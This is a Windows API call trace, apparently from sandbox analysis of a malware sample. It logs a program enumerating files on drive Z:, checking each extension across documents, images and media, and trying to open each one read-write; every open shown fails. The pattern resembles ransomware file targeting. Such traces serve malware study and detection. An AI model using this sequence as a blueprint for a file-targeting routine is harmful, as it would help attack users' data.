ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x79d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqAk5x9DCd1vbqL.xls", cAlternateFileName="")) returned 1 [0177.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.012] PathFindExtensionW (pszPath="Z:\\SqAk5x9DCd1vbqL.xls") returned=".xls" [0177.016] CreateFileW (lpFileName="Z:\\SqAk5x9DCd1vbqL.xls" (normalized: "z:\\sqak5x9dcd1vbql.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.017] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xff02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="les739ApbVb9h5NbQG.png", cAlternateFileName="")) returned 1 [0177.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.017] PathFindExtensionW (pszPath="Z:\\les739ApbVb9h5NbQG.png") returned=".png" [0177.022] CreateFileW (lpFileName="Z:\\les739ApbVb9h5NbQG.png" (normalized: "z:\\les739apbvb9h5nbqg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.024] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0c5f9ps.odt", cAlternateFileName="")) returned 1 [0177.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.024] PathFindExtensionW (pszPath="Z:\\0c5f9ps.odt") returned=".odt" [0177.029] CreateFileW (lpFileName="Z:\\0c5f9ps.odt" (normalized: "z:\\0c5f9ps.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.030] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUAALsfvQ.odp", cAlternateFileName="")) returned 1 [0177.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.031] PathFindExtensionW (pszPath="Z:\\CUAALsfvQ.odp") returned=".odp" [0177.035] CreateFileW (lpFileName="Z:\\CUAALsfvQ.odp" (normalized: "z:\\cuaalsfvq.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.036] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x107bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IyGa2UNby.ots", cAlternateFileName="")) returned 1 [0177.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.037] PathFindExtensionW (pszPath="Z:\\IyGa2UNby.ots") returned=".ots" [0177.043] CreateFileW (lpFileName="Z:\\IyGa2UNby.ots" (normalized: "z:\\iyga2unby.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.044] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xce96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NrdJUxDyhDG3y7Oab1mj.flv", cAlternateFileName="")) returned 1 [0177.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.044] PathFindExtensionW (pszPath="Z:\\NrdJUxDyhDG3y7Oab1mj.flv") returned=".flv" [0177.050] CreateFileW (lpFileName="Z:\\NrdJUxDyhDG3y7Oab1mj.flv" (normalized: "z:\\nrdjuxdyhdg3y7oab1mj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc9f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HwIsy.png", cAlternateFileName="")) returned 1 [0177.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.053] PathFindExtensionW (pszPath="Z:\\HwIsy.png") returned=".png" [0177.058] CreateFileW (lpFileName="Z:\\HwIsy.png" (normalized: "z:\\hwisy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.059] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14b01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LYsglM.bmp", cAlternateFileName="")) returned 1 [0177.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.059] PathFindExtensionW (pszPath="Z:\\LYsglM.bmp") returned=".bmp" [0177.064] CreateFileW (lpFileName="Z:\\LYsglM.bmp" (normalized: "z:\\lysglm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.067] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbb11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mro5NomIUcrU.gif", cAlternateFileName="")) returned 1 [0177.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.067] PathFindExtensionW (pszPath="Z:\\Mro5NomIUcrU.gif") returned=".gif" [0177.071] CreateFileW (lpFileName="Z:\\Mro5NomIUcrU.gif" (normalized: "z:\\mro5nomiucru.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.073] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17ae3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6IeyZTL6ti1EIr3r.csv", cAlternateFileName="")) returned 1 [0177.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.073] PathFindExtensionW (pszPath="Z:\\6IeyZTL6ti1EIr3r.csv") returned=".csv" [0177.077] CreateFileW (lpFileName="Z:\\6IeyZTL6ti1EIr3r.csv" (normalized: "z:\\6ieyztl6ti1eir3r.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.079] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe624, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XP77ZtgAwnoAMmLb.odt", cAlternateFileName="")) returned 1 [0177.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.079] PathFindExtensionW (pszPath="Z:\\XP77ZtgAwnoAMmLb.odt") returned=".odt" [0177.084] CreateFileW (lpFileName="Z:\\XP77ZtgAwnoAMmLb.odt" (normalized: "z:\\xp77ztgawnoammlb.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.086] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5eu5ng8aXBTiqaLM.odt", cAlternateFileName="")) returned 1 [0177.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.086] PathFindExtensionW (pszPath="Z:\\Z5eu5ng8aXBTiqaLM.odt") returned=".odt" [0177.090] CreateFileW (lpFileName="Z:\\Z5eu5ng8aXBTiqaLM.odt" (normalized: "z:\\z5eu5ng8axbtiqalm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.091] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1463b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYAzuw.flv", cAlternateFileName="")) returned 1 [0177.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.092] PathFindExtensionW (pszPath="Z:\\cYAzuw.flv") returned=".flv" [0177.096] CreateFileW (lpFileName="Z:\\cYAzuw.flv" (normalized: "z:\\cyazuw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.098] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17088, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ouLbzd5zuNL.xlsx", cAlternateFileName="")) returned 1 [0177.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.098] PathFindExtensionW (pszPath="Z:\\ouLbzd5zuNL.xlsx") returned=".xlsx" [0177.103] CreateFileW (lpFileName="Z:\\ouLbzd5zuNL.xlsx" (normalized: "z:\\oulbzd5zunl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.105] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x95ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ziRSYvhMQo.gif", cAlternateFileName="")) returned 1 [0177.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.105] PathFindExtensionW (pszPath="Z:\\ziRSYvhMQo.gif") returned=".gif" [0177.109] CreateFileW (lpFileName="Z:\\ziRSYvhMQo.gif" (normalized: "z:\\zirsyvhmqo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.111] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1287d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ziDfPcXQbWyMR.mkv", cAlternateFileName="")) returned 1 [0177.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.111] PathFindExtensionW (pszPath="Z:\\ziDfPcXQbWyMR.mkv") returned=".mkv" [0177.116] CreateFileW (lpFileName="Z:\\ziDfPcXQbWyMR.mkv" (normalized: "z:\\zidfpcxqbwymr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.118] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16553, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XsxuUpRBb.png", cAlternateFileName="")) returned 1 [0177.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.118] PathFindExtensionW (pszPath="Z:\\XsxuUpRBb.png") returned=".png" [0177.123] CreateFileW (lpFileName="Z:\\XsxuUpRBb.png" (normalized: "z:\\xsxuuprbb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.124] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11336, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyT73XuoM.png", cAlternateFileName="")) returned 1 [0177.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.124] PathFindExtensionW (pszPath="Z:\\ZyT73XuoM.png") returned=".png" [0177.129] CreateFileW (lpFileName="Z:\\ZyT73XuoM.png" (normalized: "z:\\zyt73xuom.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.131] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x118b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F2MyXNYBvTRkVNI7iEZq.ods", cAlternateFileName="")) returned 1 [0177.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.132] PathFindExtensionW (pszPath="Z:\\F2MyXNYBvTRkVNI7iEZq.ods") returned=".ods" [0177.137] CreateFileW (lpFileName="Z:\\F2MyXNYBvTRkVNI7iEZq.ods" (normalized: "z:\\f2myxnybvtrkvni7iezq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.138] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbc27, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YfJ9v2Plxllw22M.pps", cAlternateFileName="")) returned 1 [0177.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.138] PathFindExtensionW (pszPath="Z:\\YfJ9v2Plxllw22M.pps") returned=".pps" [0177.143] CreateFileW (lpFileName="Z:\\YfJ9v2Plxllw22M.pps" (normalized: "z:\\yfj9v2plxllw22m.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.145] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4fa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="17V0s09qqy.m4a", cAlternateFileName="")) returned 1 [0177.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.146] PathFindExtensionW (pszPath="Z:\\17V0s09qqy.m4a") returned=".m4a" [0177.150] CreateFileW (lpFileName="Z:\\17V0s09qqy.m4a" (normalized: "z:\\17v0s09qqy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.152] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc5f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lhOcmpk4G7IYSvvb.gif", cAlternateFileName="")) returned 1 [0177.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.152] PathFindExtensionW (pszPath="Z:\\lhOcmpk4G7IYSvvb.gif") returned=".gif" [0177.157] CreateFileW (lpFileName="Z:\\lhOcmpk4G7IYSvvb.gif" (normalized: "z:\\lhocmpk4g7iysvvb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.160] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x546b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XAdhL2WimPIvd1az2SF4.avi", cAlternateFileName="")) returned 1 